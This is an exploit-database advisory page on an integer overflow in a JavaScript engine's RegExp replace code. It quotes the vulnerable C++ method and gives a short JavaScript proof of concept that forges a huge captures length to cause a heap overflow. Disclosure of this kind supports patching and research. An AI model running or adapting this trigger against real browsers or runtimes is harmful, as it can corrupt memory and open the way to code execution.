Integer Overflow in JavaScript RegExp

vendor:

N/A

by:

Anonymous

7.5

CVSS

HIGH

Integer Overflow

190

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: JavaScript

2020

Integer Overflow in JavaScript RegExp

The variable "captures_length" can be controlled by the user, so an integer overflow may occur at (a) which causes a heap overflow at (b).

Mitigation:

Validate user input and ensure that the length of the captures array is within the expected range.

Source

Exploit-DB raw data:

/*
Here's a snippet of the method.
    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
        isolate, captures_length_obj,
        Object::ToLength(isolate, captures_length_obj));
    const int captures_length = PositiveNumberToUint32(*captures_length_obj);
    ...
    if (functional_replace) {
      const int argc =
          has_named_captures ? captures_length + 3 : captures_length + 2; <<-- (a)

      ScopedVector<Handle<Object>> argv(argc);

      int cursor = 0;
      for (int j = 0; j < captures_length; j++) {
        argv[cursor++] = captures[j];
      }

      // (b)
      argv[cursor++] = handle(Smi::FromInt(position), isolate);
      argv[cursor++] = string;

The variable "captures_length" can be controlled by the user, so an integer overflow may occur at (a) which causes a heap overflow at (b).


PoC:
*/

let cnt = 0;
let reg = /./g;
reg.exec = () => {
    if (cnt++ == 0)
        return {length: 0xfffffffe};

    cnt = 0;
    return null;
};

''.replace(reg, () => {});